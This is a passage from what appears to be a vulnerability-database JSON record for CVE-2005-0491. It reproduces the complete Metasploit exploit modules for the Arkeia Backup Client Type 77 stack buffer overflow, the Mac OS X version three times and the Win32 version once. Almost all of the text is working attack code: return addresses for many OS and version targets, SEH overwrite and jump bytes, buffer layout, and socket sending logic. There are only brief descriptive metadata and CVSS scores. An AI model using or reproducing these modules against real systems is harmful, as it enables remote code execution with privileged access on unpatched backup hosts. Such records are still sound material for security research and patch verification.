=> '-find',\r\n\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[\r\n\t\t\t\t\t\t'Arkeia 5.3.1 Stack Return (boot)',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Platform' => 'osx',\r\n\t\t\t\t\t\t\t'Arch' => ARCH_PPC,\r\n\t\t\t\t\t\t\t'Ret' => 0xbffff910,\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Feb 18 2005',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef check\r\n\t\tinfo = arkeia_info()\r\n\t\tif !(info and info['Version'])\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\tprint_status(\"Arkeia Server Information:\")\r\n\t\tinfo.each_pair { |k,v|\r\n\t\t\tprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\r\n\t\t}\r\n\r\n\t\tif (info['System'] !~ /Darwin/)\r\n\t\t\tprint_status(\"This module only supports Mac OS X targets\")\r\n\t\t\treturn Exploit::CheckCode::Detected\r\n\t\tend\r\n\r\n\t\tif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\r\n\t\t\treturn Exploit::CheckCode::Vulnerable\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Safe\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tconnect\r\n\r\n\t\t# Request has to be big enough to find and small enough\r\n\t\t# not to write off the end of the stack. If we write too\r\n\t\t# far down, we also smash env[], which causes a crash in\r\n\t\t# getenv() before our function returns.\r\n\r\n\t\thead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\r\n\t\thead[6, 2] = [1200].pack('n')\r\n\r\n\t\tbuf = rand_text_english(1200, payload_badchars)\r\n\r\n\t\t# Return back to the stack either directly or via system lib\r\n\t\tbuf[0, 112] = [target.ret].pack('N') * (112/4)\r\n\r\n\t\t# Huge nop slep followed by the payload\r\n\t\tbuf[112, payload.encoded.length] = payload.encoded\r\n\r\n\t\tprint_status(\"Sending request...\")\r\n\t\tbegin\r\n\t\t\tsock.put(head)\r\n\t\t\tsock.put(buf)\r\n\t\t\tsock.get_once\r\n\t\trescue IOError, EOFError => e\r\n\t\t\tprint_status(\"Exception: #{e.class}:#{e}\")\r\n\t\tend\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16865/"}], "metasploit": [{"lastseen": "2020-06-01T22:34:55", "description": "This module exploits a stack buffer overflow in the Arkeia backup client for the Mac OS X platform. This vulnerability affects all versions up to and including 5.3.3 and has been tested with Arkeia 5.3.1 on Mac OS X 10.3.5.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Arkeia Backup Client Type 77 Overflow (Mac OS X)", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/OSX/ARKEIA/TYPE77", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Arkeia\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Arkeia backup\n client for the Mac OS X platform. This vulnerability affects\n all versions up to and including 5.3.3 and has been tested\n with Arkeia 5.3.1 on Mac OS X 10.3.5.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0491'],\n [ 'OSVDB', '14011'],\n [ 'BID', '12594']\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'MinNops' => 700,\n 'Compat' =>\n {\n 'ConnectionType' => '-find',\n },\n },\n 'Platform' => %w{ osx },\n 'Targets' =>\n [\n [\n 'Arkeia 5.3.1 Stack Return (boot)',\n {\n 'Platform' => 'osx',\n 'Arch' => ARCH_PPC,\n 'Ret' => 0xbffff910,\n },\n ],\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n info = arkeia_info()\n if !(info and info['Version'])\n return Exploit::CheckCode::Safe\n end\n\n vprint_status(\"Arkeia Server Information:\")\n info.each_pair { |k,v|\n vprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\n }\n\n if (info['System'] !~ /Darwin/)\n vprint_status(\"This module only supports Mac OS X targets\")\n return Exploit::CheckCode::Detected\n end\n\n if (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n # Request has to be big enough to find and small enough\n # not to write off the end of the stack. If we write too\n # far down, we also smash env[], which causes a crash in\n # getenv() before our function returns.\n\n head = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\n head[6, 2] = [1200].pack('n')\n\n buf = rand_text_english(1200, payload_badchars)\n\n # Return back to the stack either directly or via system lib\n buf[0, 112] = [target.ret].pack('N') * (112/4)\n\n # Huge nop slep followed by the payload\n buf[112, payload.encoded.length] = payload.encoded\n\n print_status(\"Sending request...\")\n begin\n sock.put(head)\n sock.put(buf)\n sock.get_once\n rescue IOError, EOFError => e\n print_status(\"Exception: #{e.class}:#{e}\")\n end\n handler\n disconnect\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/arkeia/type77.rb"}, {"lastseen": "2020-07-24T21:52:01", "description": "This module exploits a stack buffer overflow in the Arkeia backup client for the Windows platform. This vulnerability affects all versions up to and including 5.3.3.\n", "published": "2005-12-26T14:34:22", "type": "metasploit", "title": "Arkeia Backup Client Type 77 Overflow (Win32)", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/ARKEIA/TYPE77", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Arkeia\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Arkeia Backup Client Type 77 Overflow (Win32)',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the Arkeia backup\n client for the Windows platform. This vulnerability affects\n all versions up to and including 5.3.3.\n },\n 'Author' => [ 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2005-0491' ],\n [ 'OSVDB', '14011'],\n [ 'BID', '12594'],\n [ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'],\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'StackAdjustment' => -3500,\n },\n 'Platform' => %w{ win },\n 'Targets' =>\n [\n ['Arkeia 5.3.3 and 5.2.27 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x004130a2, 5 ] }], # arkeiad.exe\n ['Arkeia 5.2.27 and 5.1.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00407b9c, 5 ] }], # arkeiad.exe\n ['Arkeia 5.3.3 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x0041d6b9, 5 ] }], # arkeiad.exe\n ['Arkeia 5.1.19 and 5.0.19 Windows (All)', { 'Platform' => 'win', 'Rets' => [ 0x00423264, 5 ] }], # arkeiad.exe\n ['Arkeia 5.x Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 5 ] }], # ws2help.dll\n ['Arkeia 5.x Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 5 ] }], # ws2help.dll\n ['Arkeia 5.x Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 5 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows 2000 English', { 'Platform' => 'win', 'Rets' => [ 0x75022ac4, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows XP English SP0/SP1', { 'Platform' => 'win', 'Rets' => [ 0x71aa32ad, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows NT 4.0 SP4/SP5/SP6', { 'Platform' => 'win', 'Rets' => [ 0x77681799, 4 ] }], # ws2help.dll\n ['Arkeia 4.2 Windows 2000 German', { 'Platform' => 'win', 'Rets' => [ 0x74fa1887, 4 ] }], # ws2help.dll\n ],\n 'DisclosureDate' => 'Feb 18 2005',\n 'DefaultTarget' => 0))\n end\n\n def check\n info = arkeia_info()\n if !(info and info['Version'])\n return Exploit::CheckCode::Safe\n end\n\n vprint_status(\"Arkeia Server Information:\")\n info.each_pair { |k,v|\n vprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\")\n }\n\n if (info['System'] !~ /Windows/)\n vprint_status(\"This module only supports Windows targets\")\n return Exploit::CheckCode::Detected\n end\n\n if (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/)\n return Exploit::CheckCode::Appears\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n connect\n\n print_status(\"Trying target #{target.name}...\")\n\n head = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\"\n data = (target['Rets'][1] == 5) ? prep_ark5() : prep_ark4()\n head[6, 2] = [data.length].pack('n')\n\n begin\n sock.put(head)\n sock.put(data)\n sock.get_once\n rescue IOError, EOFError => e\n print_status(\"Exception: #{e.class}:#{e}\")\n end\n handler\n disconnect\n end\n\n def prep_ark5\n data = rand_text_english(4096, payload_badchars)\n data[1176, 4] = [target['Rets'][0]].pack('V')\n data[1172, 2] = \"\\xeb\\xf9\"\n data[1167, 5] = \"\\xe98\" + [-1172].pack('V')\n data[0, payload.encoded.length] = payload.encoded\n end\n\n def prep_ark4\n data = rand_text_english(4096, payload_badchars)\n seh = generate_seh_payload( target['Rets'][0] )\n data[ 96, seh.length] = seh\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/arkeia/type77.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:11:50", "description": "", "published": "2009-10-28T00:00:00", "type": "packetstorm", "title": "Arkeia Backup Client Type 77 Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0491"], "modified": "2009-10-28T00:00:00", "id": "PACKETSTORM:82305", "href": "https://packetstormsecurity.com/files/82305/Arkeia-Backup-Client-Type-77-Overflow.html", "sourceData": "`## \n# $Id$ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \n \nclass Metasploit3 < Msf::Exploit::Remote \n \ninclude Msf::Exploit::Remote::Arkeia \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Arkeia Backup Client Type 77 Overflow (Mac OS X)', \n'Description' => %q{ \nThis module exploits a stack overflow in the Arkeia backup \nclient for the Mac OS X platform. This vulnerability affects \nall versions up to and including 5.3.3 and has been tested \nwith Arkeia 5.3.1 on Mac OS X 10.3.5. \n \n}, \n'Author' => [ 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision$', \n'References' => \n[ \n[ 'CVE', '2005-0491'], \n[ 'OSVDB', '14011'], \n[ 'BID', '12594'], \n[ 'URL', 'http://lists.netsys.com/pipermail/full-disclosure/2005-February/031831.html'], \n \n], \n'Privileged' => true, \n'Payload' => \n{ \n'Space' => 1000, \n'BadChars' => \"\\x00\", \n'MinNops' => 700, \n'Compat' => \n{ \n'ConnectionType' => '-find', \n}, \n}, \n'Targets' => \n[ \n[ \n'Arkeia 5.3.1 Stack Return (boot)', \n{ \n'Platform' => 'osx', \n'Arch' => ARCH_PPC, \n'Ret' => 0xbffff910, \n}, \n], \n], \n'DisclosureDate' => 'Feb 18 2005', \n'DefaultTarget' => 0)) \nend \n \ndef check \ninfo = arkeia_info() \nif !(info and info['Version']) \nreturn Exploit::CheckCode::Safe \nend \n \nprint_status(\"Arkeia Server Information:\") \ninfo.each_pair { |k,v| \nprint_status(\" #{k + (\" \" * (30-k.length))} = #{v}\") \n} \n \nif (info['System'] !~ /Darwin/) \nprint_status(\"This module only supports Mac OS X targets\") \nreturn Exploit::CheckCode::Detected \nend \n \nif (info['Version'] =~ /Backup (4\\.|5\\.([012]\\.|3\\.[0123]$))/) \nreturn Exploit::CheckCode::Vulnerable \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \ndef exploit \nconnect \n \n# Request has to be big enough to find and small enough \n# not to write off the end of the stack. If we write too \n# far down, we also smash env[], which causes a crash in \n# getenv() before our function returns. \n \nhead = \"\\x00\\x4d\\x00\\x03\\x00\\x01\\xff\\xff\" \nhead[6, 2] = [1200].pack('n') \n \nbuf = rand_text_english(1200, payload_badchars) \n \n# Return back to the stack either directly or via system lib \nbuf[0, 112] = [target.ret].pack('N') * (112/4) \n \n# Huge nop slep followed by the payload \nbuf[112, payload.encoded.length] = payload.encoded \n \nprint_status(\"Sending request...\") \nbegin \nsock.put(head) \nsock.put(buf) \nsock.get_once \nrescue IOError, EOFError => e \nprint_status(\"Exception: #{e.class}:#{e}\") \nend \nhandler \ndisconnect \nend \n \nend \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/82305/type77.rb.txt"}]}
